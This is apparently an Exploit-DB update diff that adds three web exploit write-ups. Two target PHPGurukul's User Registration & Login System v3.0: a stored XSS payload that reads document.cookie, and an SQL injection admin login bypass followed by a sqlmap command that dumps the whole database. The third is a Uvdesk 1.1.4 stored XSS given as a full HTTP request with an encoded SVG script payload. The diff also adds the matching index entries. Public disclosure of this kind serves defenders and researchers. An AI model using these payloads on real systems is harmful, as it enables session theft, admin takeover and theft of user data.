DB: 2023-08-25

4 changes to exploits/shellcodes/ghdb

User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)

Uvdesk 1.1.4 - Stored XSS (Authenticated)

exploits/php/webapps/51694.txt

@@ -0,0 +1,33 @@
+# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
+# Google Dork: NA
+# Date: 19/08/2023
+# Exploit Author: Ashutosh Singh Umath
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 3.0
+# Tested on: Windows 11
+# CVE : Requested
+
+
+Description
+
+User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem.
+2. Enter <img src="x" onerror=alert(document.cookie)> in one of the
+fields (first name, last name, email, or contact).
+3. Click sign up.
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin.
+2. After login successfully go to manage user page.
+3. Payload
+
+
+Thanks and Regards,
+
+Ashutosh Singh Umath

exploits/php/webapps/51695.txt

@@ -0,0 +1,39 @@
+# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
+# Google Dork: NA
+# Date: 19/08/2023
+# Exploit Author: Ashutosh Singh Umath
+# Vendor Homepage: https://phpgurukul.com
+# Software Link:
+https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 3.0
+# Tested on: Windows 11
+# CVE : Requested
+
+
+Proof Of Concept:
+
+1. Navigate to the admin login page.
+
+URL: http://192.168.1.5/loginsystem/admin/
+
+2. Enter "*admin' -- -*" in the admin username field and anything
+random in the password field.
+
+3. Now you successfully logged in as admin.
+
+4. To download all the data from the database, use the below commands.
+
+  4.1. Login to the admin portal and capture the request.
+
+  4.2. Copy the intercepted request in a file.
+
+  4.3. Now use the below command to dump all the data
+
+
+Command:  sqlmap -r <file-name> -p username -D loginsystem --dump-all
+
+
+
+Thanks and Regards,
+
+Ashutosh Singh Umath

exploits/php/webapps/51696.txt

@@ -0,0 +1,140 @@
+# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)
+# Date: 14/08/2023
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://www.uvdesk.com/
+# Software Link: https://github.com/MegaTKC/AeroCMS
+# Version: 1.1.4
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.
+
+## Example XSS Stored in new ticket
+
+-----------------------------------------------------------------------------------------------------------------------
+Param: reply
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 812
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3
+Connection: close
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="threadType"
+
+forward
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="status"
+
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="subject"
+
+aaaa
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="to[]"
+
+test@local.host
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="reply"
+
+%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="pic"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="nextView"
+
+stay
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk--
+
+
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 302 Found
+Date: Mon, 14 Aug 2023 11:33:26 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Cache-Control: max-age=0, must-revalidate, private
+Location: /uvdesk/public/en/member/ticket/view/1
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
+Access-Control-Allow-Headers: Access-Control-Allow-Origin
+Access-Control-Allow-Headers: Authorization
+Access-Control-Allow-Headers: Content-Type
+X-Debug-Token: bf1b73
+X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
+X-Robots-Tag: noindex
+Expires: Mon, 14 Aug 2023 11:33:26 GMT
+Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 398
+
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta charset="UTF-8" />
+        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />
+
+        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>
+    </head>
+    <body>
+        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.
+    </body>
+</html>
+-----------------------------------------------------------------------------------------------------------------------
+Redirect and view response:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Mon, 14 Aug 2023 11:44:14 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Cache-Control: max-age=0, must-revalidate, private
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
+Access-Control-Allow-Headers: Access-Control-Allow-Origin
+Access-Control-Allow-Headers: Authorization
+Access-Control-Allow-Headers: Content-Type
+X-Debug-Token: 254ce8
+X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8
+X-Robots-Tag: noindex
+Expires: Mon, 14 Aug 2023 11:44:14 GMT
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 300607
+
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>
+[...]
+<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>
+[...]
+-----------------------------------------------------------------------------------------------------------------------
+
+XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

files_exploits.csv

@@ -31333,6 +31333,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,,2020-12-03,2020-12-07,0,,,,,,
 49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
 48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
+51695,exploits/php/webapps/51695.txt,"User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
+51694,exploits/php/webapps/51694.txt,"User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
 48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,,2020-10-20,2020-10-20,0,,,,,,
 19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,webapps,php,,2012-06-15,2012-06-15,1,OSVDB-83162;OSVDB-82970;OSVDB-82969;OSVDB-82968,,,http://www.exploit-db.com/screenshots/idlt19500/2.png,,
 7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,webapps,php,,2008-12-20,2017-01-05,1,OSVDB-51232;CVE-2008-5863,,,,,
@@ -31348,6 +31350,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
+51696,exploits/php/webapps/51696.txt,"Uvdesk 1.1.4 - Stored XSS (Authenticated)",2023-08-24,"Hubert Wojciechowski",webapps,php,,2023-08-24,2023-08-24,0,,,,,,
 51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-08-02,1,CVE-2023-39147,,,,,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info